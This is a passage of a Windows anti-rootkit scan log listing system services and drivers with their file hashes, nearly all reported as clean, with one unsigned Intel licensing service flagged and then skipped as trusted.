21:27:04.0144 0x0ce4 [ 853081957BA148F38FD8DE4390CFCF4A, 37C92C7ABA55A5FF7094F77F8EBEEE1F4BEE161CEC6B01A50FC0D0C39E36C142 ] fdc C:\WINDOWS\System32\drivers\fdc.sys
21:27:04.0151 0x0ce4 fdc - ok
21:27:04.0154 0x0ce4 [ 885C06C35CC8FAEDDE3CDA36B72CA2A9, FF6584E7AF2FB540B2183665C3E216BE98DE953CEA6A7E4C5F13514BE4AAC9D3 ] fdPHost C:\WINDOWS\system32\fdPHost.dll
21:27:04.0164 0x0ce4 fdPHost - ok
21:27:04.0167 0x0ce4 [ 367E878C79D9F391E3D53B6BBC1B6386, 739D89F6954E17B73F53702CFF8EE985FB241255D962A83BAF1A20E783CAF466 ] FDResPub C:\WINDOWS\system32\fdrespub.dll
21:27:04.0177 0x0ce4 FDResPub - ok
21:27:04.0181 0x0ce4 [ 514F6A0B83527DD6ACCC8B21A57B10E3, EA3D401E42D05BA39E5874513DFB895A086BECE4D69FC1AC12F85F326A435A4B ] fhsvc C:\WINDOWS\system32\fhsvc.dll
21:27:04.0193 0x0ce4 fhsvc - ok
21:27:04.0196 0x0ce4 [ 27E764D6460504B7271AFECE7A59FB76, A32B08142068BF042B3E47C0CA7F4FCFD07A37807B1B8DAAE614F3A132475D52 ] FileCrypt C:\WINDOWS\system32\drivers\filecrypt.sys
21:27:04.0203 0x0ce4 FileCrypt - ok
21:27:04.0207 0x0ce4 [ 3D6087F51110F3CC0DA89385354F8C5E, 49FF976C3391A257BCD4B048BF6D1273F8537005E32D65E5F272AF3294639F05 ] FileInfo C:\WINDOWS\system32\drivers\fileinfo.sys
21:27:04.0213 0x0ce4 FileInfo - ok
21:27:04.0216 0x0ce4 [ 057E95E53C38260C4EF49B3A077770CD, 7008E71663046FF1D91D9DC3570094561C812067E1CA07715A1D2E4F787207AE ] Filetrace C:\WINDOWS\system32\drivers\filetrace.sys
21:27:04.0226 0x0ce4 Filetrace - ok
21:27:04.0229 0x0ce4 [ 90B2983D8495C26345A1DC5F0C3BB07B, 50D834D40C27EEF5023556A77B13D3335789333E302A73DF221CD86D156FDEE9 ] flpydisk C:\WINDOWS\System32\drivers\flpydisk.sys
21:27:04.0236 0x0ce4 flpydisk - ok
21:27:04.0243 0x0ce4 [ A84261F75F490E45CFEDBA77EFE4F67E, 292BA04D8996140255E4B6105015C2A640890BEFB6C022E30E0D9CBF45D5F4DB ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
21:27:04.0254 0x0ce4 FltMgr - ok
21:27:04.0282 0x0ce4 [ 3B42FD3CCD1E7A6A192B88284B0CBA4F, 2ABD147A845AAD109F1E27258D60E4AE7AB582F303A821436CFF17645AE8F6D9 ] FontCache C:\WINDOWS\system32\FntCache.dll
21:27:04.0326 0x0ce4 FontCache - ok
21:27:04.0333 0x0ce4 [ B282011D13BBEEA0273DF33C5E776D55, B4AF068BBB09D0F546F5590FCDD745250CFD58DD3A8ABF5DC26670FA32D181FB ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
21:27:04.0341 0x0ce4 FontCache3.0.0.0 - ok
21:27:04.0351 0x0ce4 [ 8E0A89C8BC29F4B066B1DA4B96A63609, 1F4ABEC209ECDCA20620C7D7DB0C407F8D1032D506259B11FEAF2A0C3E14B1A3 ] FrameServer C:\WINDOWS\system32\FrameServer.dll
21:27:04.0371 0x0ce4 FrameServer - ok
21:27:04.0374 0x0ce4 [ D2814848206DFC18EB8D3D069FAE703E, A62263CDF9261B692423473F4FF23B01AC864C05850BA5591EB9019906B4A08B ] FsDepends C:\WINDOWS\system32\drivers\FsDepends.sys
21:27:04.0380 0x0ce4 FsDepends - ok
21:27:04.0383 0x0ce4 [ AE7EDF845F41ACA3B74567C3CE20E987, 6159C227C85912B03D8C35A1EF91705AE6C1C23C7228D6FCC0A9529844798E1B ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
21:27:04.0389 0x0ce4 Fs_Rec - ok
21:27:04.0401 0x0ce4 [ FF0699483185CE3B4E1144DF19AC5E97, 9BA0A2F04A1A51AFC3B830452AC75BE2D76300BAF1918BCF5AB60E4EB9888F0F ] fvevol C:\WINDOWS\system32\DRIVERS\fvevol.sys
21:27:04.0417 0x0ce4 fvevol - ok
21:27:04.0420 0x0ce4 [ 4616F61E24B3AEA6E0E4EA7D69531EF4, 34CB16F68E4A4D19346C7FEC29BB5FE09BAAEC19EA730C9B93450F940D124D49 ] gencounter C:\WINDOWS\System32\drivers\vmgencounter.sys
21:27:04.0426 0x0ce4 gencounter - ok
21:27:04.0429 0x0ce4 [ 23174BB6937459B924BB8EF667FB28EF, 6675B87F4DE9CCA96B6BAB9F77C4E0B377828613D9FFB03F7D443AF11321F157 ] genericusbfn C:\WINDOWS\System32\drivers\genericusbfn.sys
21:27:04.0436 0x0ce4 genericusbfn - ok
21:27:04.0441 0x0ce4 [ 4B11CFBE1D9B73A9D865F6AB26F800BA, BD76CB5AF0EE6DD404875A4C36622C6BC8CCF2975C47E28DD305EB041C6C0B91 ] GPIOClx0101 C:\WINDOWS\system32\Drivers\msgpioclx.sys
21:27:04.0448 0x0ce4 GPIOClx0101 - ok
21:27:04.0468 0x0ce4 [ CF22C0941409C772AA1568DC4F89A111, ED5895F024E64B672EB3FAE6C456FA0D30A068CF2B475A7EE988DEA4DCD6D8DE ] gpsvc C:\WINDOWS\System32\gpsvc.dll
21:27:04.0503 0x0ce4 gpsvc - ok
21:27:04.0506 0x0ce4 [ 3FC3FCF557D0BE3D724EA10642E1F6FF, 744D0DDE748A1B681087668CB893F9A60A2BBE80A71098944E75B6A9AA934C82 ] GpuEnergyDrv C:\WINDOWS\system32\drivers\gpuenergydrv.sys
21:27:04.0520 0x0ce4 GpuEnergyDrv - ok
21:27:04.0524 0x0ce4 [ 053EEEE1ABAE53F044F1E386E22AE525, 195C8B78C0CF68F3DC1C08E58CE2A7146764F9273C39EF369194A366FA8EE1AD ] gupdate C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
21:27:04.0530 0x0ce4 gupdate - ok
21:27:04.0533 0x0ce4 [ 053EEEE1ABAE53F044F1E386E22AE525, 195C8B78C0CF68F3DC1C08E58CE2A7146764F9273C39EF369194A366FA8EE1AD ] gupdatem C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
21:27:04.0539 0x0ce4 gupdatem - ok
21:27:04.0544 0x0ce4 [ F72818A52CBB5A9E8B2C9E350638A945, BB8E637DA21C911465FB13D7D28AAAE80691EA824146EEEA4AB94F86E5203567 ] gzflt C:\WINDOWS\system32\DRIVERS\gzflt.sys
21:27:04.0551 0x0ce4 gzflt - ok
21:27:04.0554 0x0ce4 [ DD1A6F4998E7E21564FA9BAFE21C87ED, CAD04E9B8244ACA3314C6FD4422BE7A3B578AF1E61F13773A2C5DB388B3337F6 ] HDAudBus C:\WINDOWS\System32\drivers\HDAudBus.sys
21:27:04.0562 0x0ce4 HDAudBus - ok
21:27:04.0565 0x0ce4 [ 9F90819E301C70A3A042FC05D3E41B5F, D2175786775D08686264001ABAA4B61DC08A847666F6B9A2A64D10BFC022F646 ] HidBatt C:\WINDOWS\System32\drivers\HidBatt.sys
21:27:04.0571 0x0ce4 HidBatt - ok
21:27:04.0575 0x0ce4 [ 3CA3244C45B25F3B3ED9445C195E40EB, 9C43B31DAB473D29069D0D6BC130660424FE2414BA519107641FA1561C10C76D ] HidBth C:\WINDOWS\System32\drivers\hidbth.sys
21:27:04.0583 0x0ce4 HidBth - ok
21:27:04.0587 0x0ce4 [ 55DAF856F9633DD2519BA4E942870F02, 5283548CB93EB46C5FD3B08E45C97BBFB33D47F11F89560508775889FBF2F754 ] hidi2c C:\WINDOWS\System32\drivers\hidi2c.sys
21:27:04.0594 0x0ce4 hidi2c - ok
21:27:04.0598 0x0ce4 [ E34216A190D9BF8EAA666F6903BCD0EF, DA8529DAF903B447CC5FF2D112F670696549A4B66F54DF9A8C8C615D969CD477 ] hidinterrupt C:\WINDOWS\System32\drivers\hidinterrupt.sys
21:27:04.0604 0x0ce4 hidinterrupt - ok
21:27:04.0607 0x0ce4 [ 852DBB5185996AD8C73872A43A453729, 8C20331AE99E280799407CC5FCF88F8F645C331604230876A2CD7C253B9BD633 ] HidIr C:\WINDOWS\System32\drivers\hidir.sys
21:27:04.0614 0x0ce4 HidIr - ok
21:27:04.0618 0x0ce4 [ 6339CC87F0F610D1575C9A419940602A, B2A054ED0B669FA54E250EC2926955B1D944FA1FB2AF5B590C181CB2E9D297BA ] hidserv C:\WINDOWS\system32\hidserv.dll
21:27:04.0626 0x0ce4 hidserv - ok
21:27:04.0629 0x0ce4 [ C1A608120DE0DF52E51B8BAF86AF19F9, F3529822E78CFCA2E323A75926A833529889E40BB9602B287CC343C496CB2062 ] HidUsb C:\WINDOWS\System32\drivers\hidusb.sys
21:27:04.0636 0x0ce4 HidUsb - ok
21:27:04.0642 0x0ce4 [ BD1CF47172B97707DFC66ADA741AE2BE, 9607AB7074FC54D88FDF6E2A31506BCF8ECBF8FD651BB5CEA2421471C24BCED1 ] HomeGroupListener C:\WINDOWS\system32\ListSvc.dll
21:27:04.0655 0x0ce4 HomeGroupListener - ok
21:27:04.0664 0x0ce4 [ A004895B838003BAE2281DAF193B6A09, 587FCDCEF769B2AED12551B6426477B764CB8A025E692D4EC8B24E1CBA1C06E3 ] HomeGroupProvider C:\WINDOWS\system32\provsvc.dll
21:27:04.0681 0x0ce4 HomeGroupProvider - ok
21:27:04.0685 0x0ce4 [ 8ADD9CA3E0F18CEA11EA6FAED794A228, B46BA885ED8253A253B1C87C331CA145F7F397AF49853038B3F1EDAF81B2C4BA ] HpSAMD C:\WINDOWS\system32\drivers\HpSAMD.sys
21:27:04.0692 0x0ce4 HpSAMD - ok
21:27:04.0709 0x0ce4 [ 2413454E305678EA9A486E8DE2E67849, 5E821E909F99BAB782D89A0CDBFAE5474FEA211EB4F626A824D10D733F3FDC67 ] HTTP C:\WINDOWS\system32\drivers\HTTP.sys
21:27:04.0732 0x0ce4 HTTP - ok
21:27:04.0737 0x0ce4 [ D3C45F1B5BB3EE772CDA416A4A3EEB9B, 97CD988CF307EBCC34F37F130F4F2C989DD17E70B2498DB1929B566A3387887B ] HvHost C:\WINDOWS\System32\hvhostsvc.dll
21:27:04.0744 0x0ce4 HvHost - ok
21:27:04.0747 0x0ce4 [ F60F8390B635156593F7493AE898AFB0, AC5E58CDA12072C5FDBFEA0FA009CE2E251D143FC0878B2658ECCCF797B8B0EC ] hvservice C:\WINDOWS\system32\drivers\hvservice.sys
21:27:04.0754 0x0ce4 hvservice - ok
21:27:04.0756 0x0ce4 [ 563F5FC3B46A70A91AB6C8822AC8BF25, 43E647A7752D7444BF306E38571130AB778AA2A6892782C6C1112E47FBEFBC87 ] hwpolicy C:\WINDOWS\system32\drivers\hwpolicy.sys
21:27:04.0762 0x0ce4 hwpolicy - ok
21:27:04.0764 0x0ce4 [ C082249BC3E972C8A132D9EC6AD9EAD5, D69EEFD97CF5E0BD64D11DE1C331D02A9BE522BB93A40FF32ED434D960B85D39 ] hyperkbd C:\WINDOWS\System32\drivers\hyperkbd.sys
21:27:04.0771 0x0ce4 hyperkbd - ok
21:27:04.0775 0x0ce4 [ C6C8315E3262FAE460529C6DA2951682, 4ADBFA6601209BF6F5A9797721CBE2011905775CF4E266D7B42F89915D477E95 ] i8042prt C:\WINDOWS\System32\drivers\i8042prt.sys
21:27:04.0784 0x0ce4 i8042prt - ok
21:27:04.0787 0x0ce4 [ C6B8743B213F06AA60943D8366FE968F, 758954F70B810063914B243115B2C753B2BCE40190F95C30ACBA0BF04EBD5B33 ] iagpio C:\WINDOWS\System32\drivers\iagpio.sys
21:27:04.0794 0x0ce4 iagpio - ok
21:27:04.0797 0x0ce4 [ 9A2A2F3C69B9A30B6E78536F6D258BAD, 5E28E132A7300E6F5E0C6439D6BA00F1AEF66D729FF671FDA91274A25A921463 ] iai2c C:\WINDOWS\System32\drivers\iai2c.sys
21:27:04.0805 0x0ce4 iai2c - ok
21:27:04.0809 0x0ce4 [ 42962355A7911407026E920E7252E3E5, 4A4016A53ED61354C81C594968339E6F3CCCFF4A64F8F28AD008ED8137E05AD2 ] iaLPSS2i_GPIO2 C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys
21:27:04.0817 0x0ce4 iaLPSS2i_GPIO2 - ok
21:27:04.0821 0x0ce4 [ BD47B2FEABFA48C6224D43EE9EA9BC06, 304628CA458AA7B1B8B1CFF12074AD75C1CE7BD41820B99607D7FA99A817D007 ] iaLPSS2i_GPIO2_BXT_P C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys
21:27:04.0829 0x0ce4 iaLPSS2i_GPIO2_BXT_P - ok
21:27:04.0834 0x0ce4 [ 2184CB3A65888F446FCD6DBA9F073F4C, 0B3D63EC7F61BFAD490C123084965A9F38DBFE587AC9DAE6F4E6B68AD8093DB2 ] iaLPSS2i_I2C C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys
21:27:04.0843 0x0ce4 iaLPSS2i_I2C - ok
21:27:04.0848 0x0ce4 [ 4126F8DA08CE7924A3AE6F7235F85D5F, 668DC1D09496A95F44C07C5C1F6ED7D3EFC6F89523B2744A86B460E5BECAEFB5 ] iaLPSS2i_I2C_BXT_P C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_BXT_P.sys
21:27:04.0858 0x0ce4 iaLPSS2i_I2C_BXT_P - ok
21:27:04.0862 0x0ce4 [ 16A10CCEDCF5AC4CAAE43DC9FC40392F, F77696AE55B992154A3B35F7660BD73E0AB35A6ECEEC1931C0D35748CFA605C0 ] iaLPSSi_GPIO C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys
21:27:04.0867 0x0ce4 iaLPSSi_GPIO - ok
21:27:04.0871 0x0ce4 [ EB82A11613326691508D9ED9A4FE29E7, 8445E41BAB21964C7F014742795E462BDDC6C37A261990B3D6BF4E637A719547 ] iaLPSSi_I2C C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys
21:27:04.0880 0x0ce4 iaLPSSi_I2C - ok
21:27:04.0891 0x0ce4 [ D820075D3395BED28FC57AEF8FBA666F, 7589CCCD355D2685C0E6D317AB39F0DB061153E6859A0F53834B001643CFDF57 ] iaStorAV C:\WINDOWS\system32\drivers\iaStorAV.sys
21:27:04.0908 0x0ce4 iaStorAV - ok
21:27:04.0917 0x0ce4 [ A243E0CE8644378C9A9D015ABC3EDA27, 0C72F6D39DD64A16F54BCE185F4D8E670D386823F6364E9ED284F7F8DE11CBF5 ] iaStorV C:\WINDOWS\system32\drivers\iaStorV.sys
21:27:04.0928 0x0ce4 iaStorV - ok
21:27:04.0938 0x0ce4 [ E16E4FC9F250E48CB2CAD93E59D010E2, EFF558EDD63DB0FD8BA240E94BD5999106233B95BF86BFB99EE9B897F41C542B ] ibbus C:\WINDOWS\System32\drivers\ibbus.sys
21:27:04.0951 0x0ce4 ibbus - ok
21:27:04.0957 0x0ce4 [ D9A9FFC89F61CAD4AD9EF31FBB17E634, F81184889B30DA8947F22A9C9ED5C542295ED70F0A1C27D1C91BAC21F4BCD987 ] ICCS C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
21:27:04.0964 0x0ce4 ICCS - ok
21:27:04.0969 0x0ce4 [ E3061D5ABA80394D29E26EA58AF7F69A, 9BCF1AD2CC9C7E48FD350F9D59797E17F355C840EDE428143764F93716159C20 ] icssvc C:\WINDOWS\System32\tetheringservice.dll
21:27:04.0982 0x0ce4 icssvc - ok
21:27:04.0989 0x0ce4 [ 4AB719D0CEB64ED85D30EB974A5C806E, 57DAFB6C884FA2A1A9FBDD19F91F4326A76C975AEB74011A9D18D15F2423A767 ] ignis C:\WINDOWS\system32\DRIVERS\ignis.sys
21:27:04.0998 0x0ce4 ignis - ok
21:27:05.0015 0x0ce4 [ E9E4BB312F6B544392F44D513FAA2243, 3E6917BCE9F1AF554D57FED9E76B33F36D92145B0090A5F8F64E2A53EB4C54A4 ] IKEEXT C:\WINDOWS\System32\ikeext.dll
21:27:05.0042 0x0ce4 IKEEXT - ok
21:27:05.0046 0x0ce4 [ 0E33BC018502E7FDE77C343055D9C626, CD1C60E8EDAA044E03E5776962E091C1288204033A57A799D446F9B058D6AD59 ] IndirectKmd C:\WINDOWS\System32\drivers\IndirectKmd.sys
21:27:05.0053 0x0ce4 IndirectKmd - ok
21:27:05.0113 0x0ce4 [ FEE5C21569883B2BDC655FC875CCBA21, 273C017155DB92AC3408E9A1DF5D8A4BCFFED6C3C6C2474E883E6905DFABDCFC ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RTKVHD64.sys
21:27:05.0176 0x0ce4 IntcAzAudAddService - ok
21:27:05.0192 0x0ce4 [ DAE6C3099D291EED8922A65C29ABCF52, AD0A932345382824122F84AF97A8609BAE1B916A3B9FD608779A1411E37D3643 ] Intel(R) Capability Licensing Service Interface C:\Program Files\Intel\iCLS Client\HeciServer.exe
21:27:05.0210 0x0ce4 Intel(R) Capability Licensing Service Interface - detected UnsignedFile.Multi.Generic ( 1 )
21:27:05.0524 0x0ce4 Detect skipped due to KSN trusted
21:27:05.0524 0x0ce4 Intel(R) Capability Licensing Service Interface - ok
21:27:05.0539 0x0ce4 [ D45226E3E7A25F1E7CE8DF8FD0A2A098, 7BD74E9E3CB0A83D26BA3FD8177C6B9BA46A8695B6569CF7887FDC87947DA2D6 ] Intel(R) Capability Licensing Service TCP IP Interface C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
21:27:05.0554 0x0ce4 Intel(R) Capability Licensing Service TCP IP Interface - ok
21:27:05.0558 0x0ce4 [ 4B7F8A1AAC7172DB6918A0E10E1D78A3, 1E9922AF9B5458F23A379EDCD61B615B6E53BAF8927237C1C7DCC04122CCF417 ] intelide C:\WINDOWS\system32\drivers\intelide.sys
21:27:05.0563 0x0ce4 intelide - ok
21:27:05.0566 0x0ce4 [ 0A3DBE89C965FFB7C0D0E38834E77B90, 0166BE79228ED6B3D7AA1BACB4F1BB68357DBF70DF778B2F8A3776E374EE690C ] intelpep C:\WINDOWS\system32\drivers\intelpep.sys
21:27:05.0573 0x0ce4 intelpep - ok
21:27:05.0578 0x0ce4 [ 64EC687A811DC4F69DF3816F073352AA, F70942B67448DF9848F32F88D37E1E0C548CE9FEFC4376628D7CBEF62494D8E1 ] intelppm C:\WINDOWS\System32\drivers\intelppm.sys
21:27:05.0589 0x0ce4 intelppm - ok
21:27:05.0592 0x0ce4 [ 7C0766B89BACA46A5CEE48FD4F5DF2AD, 8843F02A3F2F395698D618C376283314A0D729B2C3C2AE8BFA13F0CB64F61097 ] IOMap C:\WINDOWS\system32\drivers\IOMap64.sys
21:27:05.0596 0x0ce4 IOMap - ok
21:27:05.0599 0x0ce4 [ 549C278119FF539C3B219C55B98B0E87, B4C15AB0C77EAB6C5ADEBD014F610BBFC537EAEB0E3960636624001C8A5DE56E ] iorate C:\WINDOWS\system32\drivers\iorate.sys
21:27:05.0605 0x0ce4 iorate - ok
21:27:05.0609 0x0ce4 [ A0F9F2E87F0C751FE164D90EB44A9B63, BE816F17E43E5F80AC65E913AB7F9E77B8D6B70B90A784CB00C907D3DAFFD4DB ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
21:27:05.0618 0x0ce4 IpFilterDriver - ok
21:27:05.0633 0x0ce4 [ 57A93FCF94FAB8C2161335E56C81CD16, 4A642E4FF70DA209074B78EC50B76A024DB5D01B8C9FCC405A64AF0F1A7EA389 ] iphlpsvc C:\WINDOWS\System32\iphlpsvc.dll
21:27:05.0667 0x0ce4 iphlpsvc - ok
21:27:05.0671 0x0ce4 [ 656DDB34996A96539BA6E2843B5F2A77, EDC3F1A2BA38A9655361A20B6C8001984AEB1A530C5385CF6EC0AF595305DBC7 ] IPMIDRV C:\WINDOWS\System32\drivers\IPMIDrv.sys
21:27:05.0678 0x0ce4 IPMIDRV - ok
21:27:05.0683 0x0ce4 [ DCC05E5EAA580C97F13B434FAFACED85, 5C6CFD3D9FAEB7274E05F3D19D3AA064624500C616650DE227B849B505662BB4 ] IPNAT C:\WINDOWS\system32\drivers\ipnat.sys
21:27:05.0693 0x0ce4 IPNAT - ok
21:27:05.0697 0x0ce4 [ 9A6B993A95CCA15502DE3C980508DC44, 370A1A4531A72CFBF331ED274913925A269115A13E3A6B5E1821FB48DD7242AE ] IpxlatCfgSvc C:\WINDOWS\System32\IpxlatCfg.dll
21:27:05.0711 0x0ce4 IpxlatCfgSvc - ok
21:27:05.0715 0x0ce4 [ 9035C10C7EB8CF7C87CEA82A62EBB43A, A0DA94E80E503DB3C2877CE1BCDC70B3FCC6861ADFBCCE66C6D2592BD63F27DC ] irda C:\WINDOWS\system32\drivers\irda.sys
21:27:05.0725 0x0ce4 irda - ok
21:27:05.0727 0x0ce4 [ E7FD479E3298F3C8852A0D2F092BDB35, 07F2E779268EBBF4F32ED1C8423493B36BA823905E71B524C6AEBA0093193307 ] IRENUM C:\WINDOWS\system32\drivers\irenum.sys
21:27:05.0735 0x0ce4 IRENUM - ok
21:27:05.0738 0x0ce4 [ 65B145143F6E5E1B5A213F0D9F4C4C44, 0E390BD8D7B4B9562E8FEE0D109DCE0D9EA823FD2D20B39FFACE3331F30FE5BC ] irmon C:\WINDOWS\System32\irmon.dll
21:27:05.0746 0x0ce4 irmon - ok
21:27:05.0749 0x0ce4 [ 7FE3B3A30FA20F27AF7022A01C2266BA, 8AB924F08ABF1DCB154B6A3BDB7E3E5A863008B5AFF8E3DB9759848774E00E8A ] isapnp C:\WINDOWS\system32\drivers\isapnp.sys
21:27:05.0755 0x0ce4 isapnp - ok
21:27:05.0761 0x0ce4 [ D492648D96A14BA639B76D177B24CD82, D65D2494BAC8A317FD70293E59D039078D1D19FAE20A4EB2665246CAACFF0C6F ] iScsiPrt C:\WINDOWS\System32\drivers\msiscsi.sys
21:27:05.0770 0x0ce4 iScsiPrt - ok
21:27:05.0775 0x0ce4 [ 52069AEB42D3D0F97CBCA1085EBF55E6, ADB2EFFF563B3FE113FCD156FD1E469BC24FC1D68AFEDCA21306F76592C9FF88 ] jhi_service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
21:27:05.0781 0x0ce4 jhi_service - ok
21:27:05.0784 0x0ce4 [ D36B404BF979297C6572AEF98B2594F2, CB2F4E6589936D35D59CA70B39A29D091540EA125BE4B937AF92CEA0C6D0AAEB ] kbdclass C:\WINDOWS\System32\drivers\kbdclass.sys
21:27:05.0791 0x0ce4 kbdclass - ok
21:27:05.0793 0x0ce4 [ 7E2036A846789D6D6A2EE21915017EE1, 82AF85CA30B440E453F7694C7EDABB5D2DB213AD2FE8620B92667DFB492229A1 ] kbdhid C:\WINDOWS\System32\drivers\kbdhid.sys
21:27:05.0800 0x0ce4 kbdhid - ok
21:27:05.0803 0x0ce4 [ 4C054B8E901F41F5743DADE8A29FF256, 1009CC2503E08AFEA849BA83135C2D75C573FC4D6EFB5DBCDCC7ACB17AF83152 ] kdnic C:\WINDOWS\System32\drivers\kdnic.sys
21:27:05.0811 0x0ce4 kdnic - ok
21:27:05.0814 0x0ce4 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] KeyIso C:\WINDOWS\system32\lsass.exe
21:27:05.0821 0x0ce4 KeyIso - ok
21:27:05.0825 0x0ce4 [ BA7A5838866618A4E82FBC05B8923605, 96E898C7768BED66487A00E02B2E50516602BCF54E6648F5528E3334AE8527EB ] KSecDD C:\WINDOWS\system32\Drivers\ksecdd.sys
21:27:05.0832 0x0ce4 KSecDD - ok
21:27:05.0837 0x0ce4 [ 6629CAA1F157088B9EDD1EAD24C6D753, 3E5F3BCB34F4B52BE46B96F9F720FE5FB37A01D4E408875F6BB89F5B5C5A3900 ] KSecPkg C:\WINDOWS\system32\Drivers\ksecpkg.sys
21:27:05.0845 0x0ce4 KSecPkg - ok
21:27:05.0848 0x0ce4 [ 365D39AD9D6BD9D61299DC098CDFC9E4, 7747A065818E1747C4FF4A96E069DE36919DFCC564D06CA232FD5EED44152687 ] ksthunk C:\WINDOWS\system32\drivers\ksthunk.sys
21:27:05.0862 0x0ce4 ksthunk - ok
21:27:05.0870 0x0ce4 [ 08F9C3F7FE3019BF53B1405B1820528F, E90940533F88A33C396E1DF9D186E945F030315FB2201E479F144E27387333CA ] KtmRm C:\WINDOWS\system32\msdtckrm.dll
21:27:05.0884 0x0ce4 KtmRm - ok
21:27:05.0891 0x0ce4 [ 0DD3C5101AE1AA7E28B4CE5AB190C261, FAFFE2102972798210ED5E766F54C5EED6262354E132E1C24539DAA598895608 ] LanmanServer C:\WINDOWS\system32\srvsvc.dll
21:27:05.0906 0x0ce4 LanmanServer - ok
21:27:05.0912 0x0ce4 [ B82D6C634638534E41748FCEC909E55D, C286EB7B3E780549F77E75B4B9F053861D82EFDCD43B1308848A08D23EFADDCA ] LanmanWorkstation C:\WINDOWS\System32\wkssvc.dll
21:27:05.0926 0x0ce4 LanmanWorkstation - ok
21:27:05.0930 0x0ce4 [ AF1077E89AD4458EC9B1CABB35595346, 762AE3218B7B05032C4199F0AE9ABCC822C3DF88BBB09536202B6B26A7944024 ] lfsvc C:\WINDOWS\System32\lfsvc.dll
21:27:05.0938 0x0ce4 lfsvc - ok
21:27:05.0940 0x0ce4 [ C0CB3B9F1F92C36B91309FDACCDF918B, 5D40C11388A48323D9D9AC18A950B09E2654092BC2F9DE45779A9354668BA18E ] LicenseManager C:\WINDOWS\system32\LicenseManagerSvc.dll
21:27:05.0948 0x0ce4 LicenseManager - ok
21:27:05.0951 0x0ce4 [ FC37745959DFA4871759E4DCC836227A, 8B63F798440FD0A34E2F2940B2598238BC852EF3EFD22147A77AB4BA6FB9E704 ] lltdio C:\WINDOWS\system32\drivers\lltdio.sys
21:27:05.0964 0x0ce4 lltdio - ok
21:27:05.0970 0x0ce4 [ 1797F544956D46966C67A2F7879403A9, D7820D2F8E936FF13D709BA1BD0541AABA8402F38698FE96DAE70B4E7A730835 ] lltdsvc C:\WINDOWS\System32\lltdsvc.dll
21:27:05.0988 0x0ce4 lltdsvc - ok
21:27:05.0991 0x0ce4 [ AE561CB0813D4DFA7D3E4471B2B70F5F, 344EA5E02D04098F032353962C1B70B0F578BCCD2843C70D6330B3F967D2FDB5 ] lmhosts C:\WINDOWS\System32\lmhsvc.dll
21:27:06.0000 0x0ce4 lmhosts - ok
21:27:06.0007 0x0ce4 [ 3DE66F47365AA8CEB18B1EE272F4FEBA, 8DDD6AB4AEDE3B2FEA0D3B63DD24E3F3422D6ADE067756A3919FCED53C349167 ] LMS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
21:27:06.0017 0x0ce4 LMS - ok
21:27:06.0022 0x0ce4 [ 16C9D4D822CCA795A72DC88B25A577CC, AEF93AA4E815F90C1A42D574C6DE7EF31FE69AD7B78B8E1AC7C27304F3CD7959 ] LSI_SAS C:\WINDOWS\system32\drivers\lsi_sas.sys
21:27:06.0028 0x0ce4 LSI_SAS - ok
21:27:06.0032 0x0ce4 [ 920F0CFCED5F28A31B79F1C470649D11, 5A5F390F2FD7C26807E7896E9F8F94EE7E69FE3C4B247BEA515588EB076148EF ] LSI_SAS2i C:\WINDOWS\system32\drivers\lsi_sas2i.sys
21:27:06.0039 0x0ce4 LSI_SAS2i - ok
21:27:06.0043 0x0ce4 [ 0FE63316F1C70A0F759A449FAC64C24B, CF99D62FDA862095BA1EB57DD58CEC070E0552E15B6F454B87D593707132636B ] LSI_SAS3i C:\WINDOWS\system32\drivers\lsi_sas3i.sys
21:27:06.0050 0x0ce4 LSI_SAS3i - ok
21:27:06.0053 0x0ce4 [ 80E82C46B27A923A3744531069B63857, C73A200FC2A009D19F2C26FAC07489EA0F4329CD7A1D80EB3200B19DFC883F8D ] LSI_SSS C:\WINDOWS\system32\drivers\lsi_sss.sys
21:27:06.0060 0x0ce4 LSI_SSS - ok
21:27:06.0072 0x0ce4 [ A69A59CD52D26443FF728FD52283598C, E416481B23CDADBB9E608E49C9DC9A520D14935E92CA9B63E7763692DB382D7D ] LSM C:\WINDOWS\System32\lsm.dll
21:27:06.0093 0x0ce4 LSM - ok
21:27:06.0097 0x0ce4 [ 88F5570C04766EE561FF129B2F93030C, A36F7FF563F813EC0F69E5BFB76C58A1C9824F54BA1729C4096E8B7B7C8D90EC ] luafv C:\WINDOWS\system32\drivers\luafv.sys
21:27:06.0108 0x0ce4 luafv - ok
21:27:06.0112 0x0ce4 [ D365217A6D4528ABB41B40C8FBD227E8, 340129785A5788A8FFE0E1B339A616D290F7504F3658F63E1A3B169B38460FBF ] MapsBroker C:\WINDOWS\System32\moshost.dll
21:27:06.0122 0x0ce4 MapsBroker - ok
21:27:06.0130 0x0ce4 [ C3EED732789052C98A2613A7E1C37CDA, D71735C8FB772EEB7F3F304CD79D8D774A9A285A94365DE0E635F61357EC9F0F ] mausbhost C:\WINDOWS\System32\drivers\mausbhost.sys
21:27:06.0141 0x0ce4 mausbhost - ok
21:27:06.0144 0x0ce4 [ 4DCE65116A28488593FF5A6A18B03DB0, AAFA7E7C1C9A38B8CF5CE530F96028191F52B1FDD2790246E413B63CF7C5F02A ] mausbip C:\WINDOWS\System32\drivers\mausbip.sys
21:27:06.0150 0x0ce4 mausbip - ok
21:27:06.0153 0x0ce4 [ 0609BF877A2F4DEECC62EEE220AB6242, 393268836EB055669997BD05866487497AFC396C9516DA4C4F143679B1DDCA6E ] megasas C:\WINDOWS\system32\drivers\megasas.sys
